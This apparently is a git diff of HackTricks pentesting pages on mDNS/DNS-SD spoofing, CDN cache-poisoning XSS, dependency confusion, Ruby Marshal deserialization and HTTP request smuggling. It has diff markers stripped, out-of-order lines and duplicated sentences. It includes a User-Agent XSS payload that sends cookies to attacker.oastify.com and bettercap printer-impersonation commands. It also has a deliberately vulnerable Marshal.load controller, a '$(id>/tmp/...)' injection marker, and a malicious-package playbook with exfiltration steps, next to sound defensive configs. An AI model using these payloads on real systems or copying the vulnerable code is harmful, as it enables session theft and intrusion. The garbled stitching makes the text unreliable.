In environments without a standard DNS server, mDNS allows devices to resolve domain names ending in **.local** by querying the multicast address **224.0.0.251** (IPv4) or **FF02::FB** (IPv6). Important aspects of mDNS include a **Time-to-Live (TTL)** value indicating record validity and a **QU bit** distinguishing between unicast and multicast queries. Security-wise, it's crucial for mDNS implementations to verify that the packet's source address aligns with the local subnet.
## DNS-SD service model
### **Functioning of DNS-SD**
Services are identified as _<service>._tcp or _<service>._udp under .local, e.g. _ipp._tcp.local (printers), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge), etc. Discover types with _services._dns-sd._udp.local, then resolve discovered instances to SRV/TXT/A/AAAA.
DNS-SD facilitates the discovery of network services by querying for pointer records (PTR) that map service types to their instances. Services are identified using a **\_\<Service>.\_tcp or \_\<Service>.\_udp** pattern within the **.local** domain, leading to the discovery of corresponding **SRV** and **TXT records** which provide detailed service information.
## Network Exploration and Enumeration
### **Network Exploration**
- nmap target scan (direct mDNS on a host):
```bash
nmap -sU -p 5353 --script=dns-service-discovery <target>
```
- nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):
```bash
sudo nmap --script=broadcast-dns-service-discovery
```
- avahi-browse (Linux):
```bash
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
```
- Apple dns-sd (macOS):
```bash
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
```
- Packet capture with tshark:
```bash
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
```
#### **nmap Usage**
A useful command for scanning the local network for mDNS services is:
```bash
nmap -Pn -sUC -p5353 [target IP address]
```
This command helps identify open mDNS ports and the services advertised over them.
#### **Network Enumeration with Pholus**
To actively send mDNS requests and capture traffic, the **Pholus** tool can be utilized as follows:
```bash
sudo python3 pholus3.py [network interface] -rq -stimeout 10
```
Tip: Some browsers/WebRTC use ephemeral mDNS hostnames to mask local IPs. If you see random-UUID.local candidates on the wire, resolve them with mDNS to pivot to local IPs.
## Attacks
### **Exploiting mDNS Probing**
### mDNS name probing interference (DoS / name squatting)
An attack vector involves sending spoofed responses to mDNS probes, suggesting that all potential names are already in use, thus hindering new devices from selecting a unique name. This can be executed using:
During the probing phase, a host checks name uniqueness. Responding with spoofed conflicts forces it to pick new names or fail. This can delay or prevent service registration and discovery.
Example with Pholus:
```bash
sudo python pholus.py [network interface] -afre -stimeout 1000
# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000
```
This technique effectively blocks new devices from registering their services on the network.
### Service spoofing and impersonation (MitM)
**In summary**, understanding the workings of mDNS and DNS-SD is crucial for network management and security. Tools like **nmap** and **Pholus** offer valuable insights into local network services, while awareness of potential vulnerabilities helps in safeguarding against attacks.
Impersonate advertised DNS-SD services (printers, AirPlay, HTTP, file shares) to coerce clients into connecting to you. This is especially useful to:
- Capture documents by spoofing _ipp._tcp or _printer._tcp.
- Lure clients to HTTP/HTTPS services to harvest tokens/cookies or deliver payloads.
- Combine with NTLM relay techniques when Windows clients negotiate auth to spoofed services.
### Spoofing/MitM
With bettercaps zerogod module (mDNS/DNS-SD spoofer/impersonator):
```bash
# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"
The most interesting attack you can perform over this service is to perform a **MitM** in the **communication between the client and the real server**. You might be able to obtain sensitive files (MitM the communication with the printer) of even credentials (Windows authentication).\
# Show all services seen from a host
> zerogod.show 192.168.1.42
# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42
# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42
# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml
```
Also see generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay workflows:
{{#ref}}
../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
{{#endref}}
### Notes on recent implementation issues (useful for DoS/persistence during engagements)
- Avahi reachable-assertion and D-Bus crash bugs (2023) can terminate avahi-daemon on Linux distributions (e.g. CVE-2023-38469..38473, CVE-2023-1981), disrupting service discovery on target hosts until restart.
- Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (2024, CVE-2024-20303) allows adjacent attackers to drive high CPU and disconnect APs. If you encounter an mDNS gateway between VLANs, be aware of its stability under malformed or high-rate mDNS.
## Defensive considerations and OPSEC
- Segment boundaries: Dont route 224.0.0.251/FF02::FB between security zones unless an mDNS gateway is explicitly required. If you must bridge discovery, prefer allowlists and rate limits.
- Windows endpoints/servers:
- To hard-disable name resolution via mDNS set the registry value and reboot:
```
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
```
- In managed environments, disable the built-in “mDNS (UDP-In)” Windows Defender Firewall rule (at least on the Domain profile) to prevent inbound mDNS processing while preserving home/roaming functionality.
- On newer Windows 11 builds/GPO templates, use the policy “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” and set it to Disabled.
- Linux (Avahi):
- Lock down publishing when not needed: set `disable-publishing=yes`, and restrict interfaces with `allow-interfaces=` / `deny-interfaces=` in `/etc/avahi/avahi-daemon.conf`.
- Consider `check-response-ttl=yes` and avoid `enable-reflector=yes` unless strictly required; prefer `reflect-filters=` allowlists when reflecting.
- macOS: Restrict inbound mDNS at host/network firewalls when Bonjour discovery is not needed for specific subnets.
- Monitoring: Alert on unusual surges in `_services._dns-sd._udp.local` queries or sudden changes in SRV/TXT of critical services; these are indicators of spoofing or service impersonation.
## Tooling quick reference
- nmap NSE: `dns-service-discovery` and `broadcast-dns-service-discovery`.
- Pholus: active scan, reverse mDNS sweeps, DoS and spoofing helpers.
```bash
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
```
- bettercap zerogod: discover, save, advertise, and impersonate mDNS/DNS-SD services (see examples above).
## Spoofing/MitM
The most interesting attack you can perform over this service is to perform a MitM in the communication between the client and the real server. You might be able to obtain sensitive files (MitM the communication with the printer) or even credentials (Windows authentication).\
For more information check:
@ -66,7 +152,8 @@ For more information check:
## References
- [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical_IoT_Hacking.html?id=GbYEEAAAQBAJ&redir_esc=y)
- [Nmap NSE: broadcast-dns-service-discovery](https://nmap.org/nsedoc/scripts/broadcast-dns-service-discovery.html)
- [bettercap zerogod (mDNS/DNS-SD discovery, spoofing, impersonation)](https://www.bettercap.org/modules/ethernet/zerogod/)
{{#include ../banners/hacktricks-training.md}}

View File

@ -176,6 +176,44 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul
Example usage: `wcvs -u example.com`
### Header-reflection XSS + CDN/WAF-assisted cache seeding (User-Agent, auto-cached .js)
This real-world pattern chains a header-based reflection primitive with CDN/WAF behavior to reliably poison the cached HTML served to other users:
- The main HTML reflected an untrusted request header (e.g., `User-Agent`) into executable context.
- The CDN stripped cache headers but an internal/origin cache existed. The CDN also auto-cached requests ending in static extensions (e.g., `.js`), while the WAF applied weaker content inspection to GETs for static assets.
- Request flow quirks allowed a request to a `.js` path to influence the cache key/variant used for the subsequent main HTML, enabling cross-user XSS via header reflection.
Practical recipe (observed across a popular CDN/WAF):
1) From a clean IP (avoid prior reputation-based downgrades), set a malicious `User-Agent` via browser or Burp Proxy Match & Replace.
2) In Burp Repeater, prepare a group of two requests and use "Send group in parallel" (single-packet mode works best):
- First request: GET a `.js` resource path on the same origin while sending your malicious `User-Agent`.
- Immediately after: GET the main page (`/`).
3) The CDN/WAF routing race plus the auto-cached `.js` often seeds a poisoned cached HTML variant that is then served to other visitors sharing the same cache key conditions (e.g., same `Vary` dimensions like `User-Agent`).
Example header payload (to exfiltrate non-HttpOnly cookies):
```
User-Agent: Mo00ozilla/5.0</script><script>new Image().src='https://attacker.oastify.com?a='+document.cookie</script>"
```
Operational tips:
- Many CDNs hide cache headers; poisoning may appear only on multi-hour refresh cycles. Use multiple vantage IPs and throttle to avoid rate-limit or reputation triggers.
- Using an IP from the CDN's own cloud sometimes improves routing consistency.
- If a strict CSP is present, this still works if the reflection executes in main HTML context and CSP allows inline execution or is bypassed by context.
Impact:
- If session cookies arent `HttpOnly`, zero-click ATO is possible by mass-exfiltrating `document.cookie` from all users who are served the poisoned HTML.
Defenses:
- Stop reflecting request headers into HTML; strictly context-encode if unavoidable. Align CDN and origin cache policies and avoid varying on untrusted headers.
- Ensure WAF applies content inspection consistently to `.js` requests and static paths.
- Set `HttpOnly` (and `Secure`, `SameSite`) on session cookies.
## Vulnerable Examples
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
@ -249,8 +287,9 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
- [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/)
- [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
- [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
- [Burp Proxy Match & Replace](https://portswigger.net/burp/documentation/desktop/tools/proxy/match-and-replace)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -5,44 +5,284 @@
## Basic Information
In summary, a dependency confusion vulnerability occurs when a project is using a library with a **misspelled** name, **inexistent** or with an **unspecified version** and the used dependency repository allows to **gather updated versions from public** repositories.
Dependency Confusion (a.k.a. substitution attacks) happens when a package manager resolves a dependency name from an unintended, less-trusted registry/source (usually a public registry) instead of the intended private/internal one. This typically leads to the installation of an attacker-controlled package.
Common root causes:
- Typosquatting/misspelling: Importing `reqests` instead of `requests` (resolves from public registry).
- Non-existent/abandoned internal package: Importing `company-logging` that no longer exists internally, so the resolver looks in public registries and finds an attackers package.
- Version preference across multiple registries: Importing an internal `company-requests` while the resolver is allowed to also query public registries and prefers the “best”/newer version published publicly by an attacker.
Key idea: If the resolver can see multiple registries for the same package name and is allowed to pick the “best” candidate globally, youre vulnerable unless you constrain resolution.
- **Misspelled**: Import **`reqests`** instead of `requests`
- **Inexistent**: Import `company-logging`, an internal library which **no longer exists**
- **Unspecified version**: Import an **internal** **existent** `company-requests` library , but the repo check **public repos** to see if there are **greater versions**.
## Exploitation
> [!WARNING]
> In all cases the attacker just need to publish a **malicious package with name** of libraries used by the victim company.
> In all cases, the attacker only needs to publish a malicious package with the same name as the dependency your build resolves from a public registry. Installation-time hooks (e.g., npm scripts) or import-time code paths often give code execution.
### Misspelled & Inexistent
If your company is trying to **import a library that isn't internal**, highly probably the repo of libraries is going to be searching for it in **public repositories**. If an attacker has created it, your code and machines running is highly probably going to be compromised.
If your project references a library that isnt available in the private registry, and your tooling falls back to a public registry, an attacker can seed a malicious package with that name in the public registry. Your runners/CI/dev machines will fetch and execute it.
### Unspecified Version
### Unspecified Version / “Best-version” selection across indexes
Developers frequently leave versions unpinned or allow wide ranges. When a resolver is configured with both internal and public indexes, it may select the newest version regardless of source. For internal names like `requests-company`, if the internal index has `1.0.1` but an attacker publishes `1.0.2` to the public registry and your resolver considers both, the public package may win.
It's very common for developers to **not specify any version** of the library used, or specify just a **major version**. Then, the interpreter will try to download the **latest version** fitting those requirements.\
If the library is a **known external library** (like python `requests`), an **attacker cannot do much**, as he won't be able to create a library called `requests` (unless he is the original author).\
However, if the library is **internal**, like `requests-company` in this example, if the **library repo** allows to **check for new versions also externally**, it will search for a newer version publicly available.\
So if an **attacker knows** that the company is using the `requests-company` library **version 1.0.1** (allow minor updates). He can **publish** the library `requests-company` **version 1.0.2** and the company will **use that library instead** of the internal one.
## AWS Fix
This vulnerability was found in AWS **CodeArtifact** (read the [**details in this blog post**](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)).\
AWS fixed this by allowing to specify if a library is internal or external, to avoid downloading internal dependencied from external repositories.
This vulnerability was found in AWS CodeArtifact (read the details in this blog post). AWS added controls to mark dependencies/feeds as internal vs external so the client wont fetch “internal” names from upstream public registries.
## Finding Vulnerable Libraries
In the [**original post about dependency confusion**](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) the author searched for thousands of exposed package.json files containing javascript projects dependencies.
In the original post about dependency confusion the author looked for thousands of exposed manifests (e.g., `package.json`, `requirements.txt`, lockfiles) to infer internal package names and then published higher-versioned packages to public registries.
## Practical Attacker Playbook (for red teams in authorized tests)
- Enumerate names:
- Grep repos and CI configs for manifest/lock files and internal namespaces.
- Look for organization-specific prefixes (e.g., `@company/*`, `company-*`, internal groupIds, NuGet ID patterns, private module paths for Go, etc.).
- Check public registries for availability:
- If the name is unregistered publicly, register it; if it exists, attempt subdependency hijacking by targeting internal transitive names.
- Publish with precedence:
- Choose a semver that “wins” (e.g., a very high version) or matches resolver rules.
- Include minimal install-time execution where applicable (e.g., npm `preinstall`/`install`/`postinstall` scripts). For Python, prefer import-time execution paths, as wheels typically dont execute arbitrary code on install.
- Exfil control:
- Ensure outbound is allowed from CI to your controlled endpoint; otherwise use DNS queries or error messages as a side-channel to prove code execution.
> [!CAUTION]
> Always get written authorization, use unique package names/versions for the engagement, and immediately unpublish or coordinate cleanup when testing concludes.
## Defender Playbook (what actually prevents confusion)
High-level strategies that work across ecosystems:
- Use unique internal namespaces and bind them to a single registry.
- Avoid mixing trust levels at resolution time. Prefer a single internal registry that proxies approved public packages instead of giving package managers both internal and public endpoints.
- For managers that support it, map packages to specific sources (no global “best-version” across registries).
- Pin and lock:
- Use lockfiles that record the resolved registry URLs (npm/yarn/pnpm) or use hash/attestation pinning (pip `--require-hashes`, Gradle dependency verification).
- Block public fallback for internal names at the registry/network layer.
- Reserve your internal names in public registries when feasible to prevent future squat.
## Ecosystem Notes and Secure Config Snippets
Below are pragmatic, minimal configs to reduce or eliminate dependency confusion. Prefer enforcing these in CI and developer environments.
### JavaScript/TypeScript (npm, Yarn, pnpm)
- Use scoped packages for all internal code and pin the scope to your private registry.
- Keep installs immutable in CI (npm lockfile, `yarn install --immutable`).
.npmrc (project-level)
```
# Bind internal scope to private registry; do not allow public fallback for @company/*
@company:registry=https://registry.corp.example/npm/
# Always authenticate to the private registry
//registry.corp.example/npm/:_authToken=${NPM_TOKEN}
strict-ssl=true
```
package.json (for internal package)
```
{
"name": "@company/api-client",
"version": "1.2.3",
"private": false,
"publishConfig": {
"registry": "https://registry.corp.example/npm/",
"access": "restricted"
}
}
```
Yarn Berry (.yarnrc.yml)
```
npmScopes:
company:
npmRegistryServer: "https://registry.corp.example/npm/"
npmAlwaysAuth: true
# CI should fail if lockfile would change
enableImmutableInstalls: true
```
Operational tips:
- Only publish internal packages within the `@company` scope.
- For third-party packages, allow public registry via your private proxy/mirror, not directly from clients.
- Consider enabling npm package provenance for public packages you publish to increase traceability (doesnt by itself prevent confusion).
### Python (pip / Poetry)
Core rule: Dont use `--extra-index-url` to mix trust levels. Either:
- Expose a single internal index that proxies and caches approved PyPI packages, or
- Use explicit index selection and hash pinning.
pip.conf
```
[global]
index-url = https://pypi.corp.example/simple
# Disallow source distributions when possible
only-binary = :all:
# Lock with hashes generated via pip-tools
require-hashes = true
```
Generate hashed requirements with pip-tools:
```
# From pyproject.toml or requirements.in
pip-compile --generate-hashes -o requirements.txt
pip install --require-hashes -r requirements.txt
```
If you must reach public PyPI, do it via your internal proxy and maintain an explicit allowlist there. Avoid `--extra-index-url` in CI.
### .NET (NuGet)
Use Package Source Mapping to tie package ID patterns to explicit sources and prevent resolution from unexpected feeds.
nuget.config
```
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<packageSources>
<clear />
<add key="nuget.org" value="https://api.nuget.org/v3/index.json" />
<add key="corp" value="https://nuget.corp.example/v3/index.json" />
</packageSources>
<packageSourceMapping>
<packageSource key="nuget.org">
<package pattern="*" />
</packageSource>
<packageSource key="corp">
<package pattern="Company.*" />
<package pattern="Internal.Utilities" />
</packageSource>
</packageSourceMapping>
</configuration>
```
### Java (Maven/Gradle)
Maven settings.xml (mirror all to internal; disallow ad-hoc repos in POMs via Enforcer):
```
<settings>
<mirrors>
<mirror>
<id>internal-mirror</id>
<mirrorOf>*</mirrorOf>
<url>https://maven.corp.example/repository/group</url>
</mirror>
</mirrors>
</settings>
```
Add Enforcer to ban repositories declared in POMs and force usage of your mirror:
```
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-enforcer-plugin</artifactId>
<version>3.6.1</version>
<executions>
<execution>
<id>enforce-no-repositories</id>
<goals><goal>enforce</goal></goals>
<configuration>
<rules>
<requireNoRepositories />
</rules>
</configuration>
</execution>
</executions>
</plugin>
```
Gradle: Centralize and lock dependencies.
- Enforce repositories in `settings.gradle(.kts)` only:
```
dependencyResolutionManagement {
repositoriesMode = RepositoriesMode.FAIL_ON_PROJECT_REPOS
repositories {
maven { url = uri("https://maven.corp.example/repository/group") }
}
}
```
- Enable dependency verification (checksums/signatures) and commit `gradle/verification-metadata.xml`.
### Go Modules
Configure private modules so the public proxy and checksum DB arent used for them.
```
# Use corporate proxy first, then public proxy as fallback
export GOPROXY=https://goproxy.corp.example,https://proxy.golang.org
# Mark private paths to skip proxy and checksum db
export GOPRIVATE=*.corp.example.com,github.com/your-org/*
export GONOSUMDB=*.corp.example.com,github.com/your-org/*
```
### Rust (Cargo)
Replace crates.io with an approved internal mirror or vendor directory for builds; do not allow arbitrary public fallback.
.cargo/config.toml
```
[source.crates-io]
replace-with = "corp-mirror"
[source.corp-mirror]
registry = "https://crates-mirror.corp.example/index"
```
For publishing, be explicit with `--registry` and keep credentials scoped to the target registry.
### Ruby (Bundler)
Use source blocks and disable multisource Gemfiles so gems come only from the intended repository.
Gemfile
```
source "https://gems.corp.example"
source "https://rubygems.org" do
gem "rails"
gem "pg"
end
source "https://gems.corp.example" do
gem "company-logging"
end
```
Enforce at config level:
```
bundle config set disable_multisource true
```
## CI/CD and Registry Controls That Help
- Private registry as a single ingress:
- Use Artifactory/Nexus/CodeArtifact/GitHub Packages/Azure Artifacts as the only endpoint developers/CI can reach.
- Implement block/allow rules so internal namespaces never resolve from upstream public sources.
- Lockfiles are immutable in CI:
- npm: commit `package-lock.json`, use `npm ci`.
- Yarn: commit `yarn.lock`, use `yarn install --immutable`.
- Python: commit hashed `requirements.txt`, enforce `--require-hashes`.
- Gradle: commit `verification-metadata.xml` and fail on unknown artifacts.
- Outbound egress control: block direct access from CI to public registries except via the approved proxy.
- Name reservation: pre-register your internal names/namespaces in public registries where supported.
- Package provenance / attestations: when publishing public packages, enable provenance/attestations to make tampering more detectable downstream.
## References
- [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
- [https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)
- [https://learn.microsoft.com/en-us/nuget/consume-packages/package-source-mapping](https://learn.microsoft.com/en-us/nuget/consume-packages/package-source-mapping)
- [https://yarnpkg.com/configuration/yarnrc/](https://yarnpkg.com/configuration/yarnrc/)
{{#include ../banners/hacktricks-training.md}}

View File

@ -1089,6 +1089,63 @@ This payload is compiled into binary Ruby code and concatenated with a carefully
Using the arbitrary file write vulnerability, the attacker writes the crafted cache file to the computed location. Next, they trigger a server restart (by writing to tmp/restart.txt, which is monitored by Puma). During restart, when Rails requires the targeted file, the malicious cache file is loaded, resulting in remote code execution (RCE).
### Ruby Marshal exploitation in practice (updated)
Treat any path where untrusted bytes reach `Marshal.load`/`marshal_load` as an RCE sink. Marshal reconstructs arbitrary object graphs and triggers library/gem callbacks during materialization.
- Minimal vulnerable Rails code path:
```ruby
class UserRestoreController < ApplicationController
def show
user_data = params[:data]
if user_data.present?
deserialized_user = Marshal.load(Base64.decode64(user_data))
render plain: "OK: #{deserialized_user.inspect}"
else
render plain: "No data", status: :bad_request
end
end
end
```
- Common gadget classes seen in real chains: `Gem::SpecFetcher`, `Gem::Version`, `Gem::RequestSet::Lockfile`, `Gem::Resolver::GitSpecification`, `Gem::Source::Git`.
- Typical side-effect marker embedded in payloads (executed during unmarshal):
```
*-TmTT="$(id>/tmp/marshal-poc)"any.zip
```
Where it surfaces in real apps:
- Rails cache stores and session stores historically using Marshal
- Background job backends and file-backed object stores
- Any custom persistence or transport of binary object blobs
Industrialized gadget discovery:
- Grep for constructors, `hash`, `_load`, `init_with`, or side-effectful methods invoked during unmarshal
- Use CodeQLs Ruby unsafe deserialization queries to trace sources → sinks and surface gadgets
- Validate with public multi-format PoCs (JSON/XML/YAML/Marshal)
## References
- Trail of Bits Marshal madness: A brief history of Ruby deserialization exploits: https://blog.trailofbits.com/2025/08/20/marshal-madness-a-brief-history-of-ruby-deserialization-exploits/
- elttam Ruby 2.x Universal RCE Deserialization Gadget Chain: https://www.elttam.com/blog/ruby-deserialization/
- Phrack #69 Rails 3/4 Marshal chain: https://phrack.org/issues/69/12.html
- CVE-2019-5420 (Rails 5.2 insecure deserialization): https://nvd.nist.gov/vuln/detail/CVE-2019-5420
- ZDI RCE via Ruby on Rails Active Storage insecure deserialization: https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization
- Include Security Discovering gadget chains in Rubyland: https://blog.includesecurity.com/2024/03/discovering-deserialization-gadget-chains-in-rubyland/
- GitHub Security Lab Ruby unsafe deserialization (query help): https://codeql.github.com/codeql-query-help/ruby/rb-unsafe-deserialization/
- GitHub Security Lab PoCs repo: https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization
- Doyensec PR Ruby 3.4 gadget: https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization/pull/1
- Luke Jahnke Ruby 3.4 universal chain: https://nastystereo.com/security/ruby-3.4-deserialization.html
- Luke Jahnke Gem::SafeMarshal escape: https://nastystereo.com/security/ruby-safe-marshal-escape.html
- Ruby 3.4.0-rc1 release: https://github.com/ruby/ruby/releases/tag/v3_4_0_rc1
- Ruby fix PR #12444: https://github.com/ruby/ruby/pull/12444
- Trail of Bits Auditing RubyGems.org (Marshal findings): https://blog.trailofbits.com/2024/12/11/auditing-the-ruby-ecosystems-central-package-repository/
{{#include ../../banners/hacktricks-training.md}}

View File

@ -283,6 +283,117 @@ When testing for request smuggling vulnerabilities by interfering with other req
- **Load Balancing Challenges:** Front-end servers acting as load balancers may distribute requests across various back-end systems. If the "attack" and "normal" requests end up on different systems, the attack won't succeed. This load balancing aspect may require several attempts to confirm a vulnerability.
- **Unintended User Impact:** If your attack inadvertently impacts another user's request (not the "normal" request you sent for detection), this indicates your attack influenced another application user. Continuous testing could disrupt other users, mandating a cautious approach.
## Distinguishing HTTP/1.1 pipelining artifacts vs genuine request smuggling
Connection reuse (keep-alive) and pipelining can easily produce illusions of "smuggling" in testing tools that send multiple requests on the same socket. Learn to separate harmless client-side artifacts from real server-side desync.
### Why pipelining creates classic false positives
HTTP/1.1 reuses a single TCP/TLS connection and concatenates requests and responses on the same stream. In pipelining, the client sends multiple requests back-to-back and relies on in-order responses. A common false-positive is to resend a malformed CL.0-style payload twice on a single connection:
```
POST / HTTP/1.1
Host: hackxor.net
Content_Length: 47
GET /robots.txt HTTP/1.1
X: Y
```
Responses may look like:
```
HTTP/1.1 200 OK
Content-Type: text/html
```
```
HTTP/1.1 200 OK
Content-Type: text/plain
User-agent: *
Disallow: /settings
```
If the server ignored the malformed `Content_Length`, there is no FE↔BE desync. With reuse, your client actually sent this byte-stream, which the server parsed as two independent requests:
```
POST / HTTP/1.1
Host: hackxor.net
Content_Length: 47
GET /robots.txt HTTP/1.1
X: YPOST / HTTP/1.1
Host: hackxor.net
Content_Length: 47
GET /robots.txt HTTP/1.1
X: Y
```
Impact: none. You just desynced your client from the server framing.
> [!TIP]
> Burp modules that depend on reuse/pipelining: Turbo Intruder with `requestsPerConnection>1`, Intruder with "HTTP/1 connection reuse", Repeater "Send group in sequence (single connection)" or "Enable connection reuse".
### Litmus tests: pipelining or real desync?
1. Disable reuse and re-test
- In Burp Intruder/Repeater, turn off HTTP/1 reuse and avoid "Send group in sequence".
- In Turbo Intruder, set `requestsPerConnection=1` and `pipeline=False`.
- If the behavior disappears, it was likely client-side pipelining, unless youre dealing with connection-locked/stateful targets or client-side desync.
2. HTTP/2 nested-response check
- Send an HTTP/2 request. If the response body contains a complete nested HTTP/1 response, youve proven a backend parsing/desync bug instead of a pure client artifact.
3. Partial-requests probe for connection-locked front-ends
- Some FEs only reuse the upstream BE connection if the client reused theirs. Use partial-requests to detect FE behavior that mirrors client reuse.
- See PortSwigger "BrowserPowered Desync Attacks" for the connection-locked technique.
4. State probes
- Look for first- vs subsequent-request differences on the same TCP connection (first-request routing/validation).
- Burp "HTTP Request Smuggler" includes a connectionstate probe that automates this.
5. Visualize the wire
- Use the Burp "HTTP Hacker" extension to inspect concatenation and message framing directly while experimenting with reuse and partial requests.
### Connectionlocked request smuggling (reuse-required)
Some front-ends only reuse the upstream connection when the client reuses theirs. Real smuggling exists but is conditional on client-side reuse. To distinguish and prove impact:
- Prove the server-side bug
- Use the HTTP/2 nested-response check, or
- Use partial-requests to show the FE only reuses upstream when the client does.
- Show real impact even if direct cross-user socket abuse is blocked:
- Cache poisoning: poison shared caches via the desync so responses affect other users.
- Internal header disclosure: reflect FE-injected headers (e.g., auth/trust headers) and pivot to auth bypass.
- Bypass FE controls: smuggle restricted paths/methods past the front-end.
- Host-header abuse: combine with host routing quirks to pivot to internal vhosts.
- Operator workflow
- Reproduce with controlled reuse (Turbo Intruder `requestsPerConnection=2`, or Burp Repeater tab group → "Send group in sequence (single connection)").
- Then chain to cache/header-leak/control-bypass primitives and demonstrate cross-user or authorization impact.
> See also connectionstate attacks, which are closely related but not technically smuggling:
>
>{{#ref}}
>../http-connection-request-smuggling.md
>{{#endref}}
### Clientside desync constraints
If youre targeting browser-powered/client-side desync, the malicious request must be sendable by a browser cross-origin. Header obfuscation tricks wont work. Focus on primitives reachable via navigation/fetch, and then pivot to cache poisoning, header disclosure, or front-end control bypass where downstream components reflect or cache responses.
For background and end-to-end workflows:
{{#ref}}
browser-http-request-smuggling.md
{{#endref}}
### Tooling to help decide
- HTTP Hacker (Burp BApp Store): exposes low-level HTTP behavior and socket concatenation.
- "Smuggling or pipelining?" Burp Repeater Custom Action: https://github.com/PortSwigger/bambdas/blob/main/CustomAction/SmugglingOrPipelining.bambda
- Turbo Intruder: precise control over connection reuse via `requestsPerConnection`.
- Burp HTTP Request Smuggler: includes a connectionstate probe to spot firstrequest routing/validation.
> [!NOTE]
> Treat reuse-only effects as non-issues unless you can prove server-side desync and attach concrete impact (poisoned cache artifact, leaked internal header enabling privilege bypass, bypassed FE control, etc.).
## Abusing HTTP Request Smuggling
### Circumventing Front-End Security via HTTP Request Smuggling
@ -743,6 +854,8 @@ def handleResponse(req, interesting):
## Tools
- HTTP Hacker (Burp BApp Store) visualize concatenation/framing and lowlevel HTTP behavior
- https://github.com/PortSwigger/bambdas/blob/main/CustomAction/SmugglingOrPipelining.bambda Burp Repeater Custom Action "Smuggling or pipelining?"
- [https://github.com/anshumanpattnaik/http-request-smuggling](https://github.com/anshumanpattnaik/http-request-smuggling)
- [https://github.com/PortSwigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler)
- [https://github.com/gwen001/pentest-tools/blob/master/smuggler.py](https://github.com/gwen001/pentest-tools/blob/master/smuggler.py)
@ -761,8 +874,11 @@ def handleResponse(req, interesting):
- [https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/](https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/)
- [https://portswigger.net/research/trace-desync-attack](https://portswigger.net/research/trace-desync-attack)
- [https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)
- Beware the false falsepositive: how to distinguish HTTP pipelining from request smuggling [https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling](https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling)
- [https://http1mustdie.com/](https://http1mustdie.com/)
- BrowserPowered Desync Attacks [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)
- PortSwigger Academy clientside desync [https://portswigger.net/web-security/request-smuggling/browser/client-side-desync](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -2,9 +2,22 @@
{{#include ../../banners/hacktricks-training.md}}
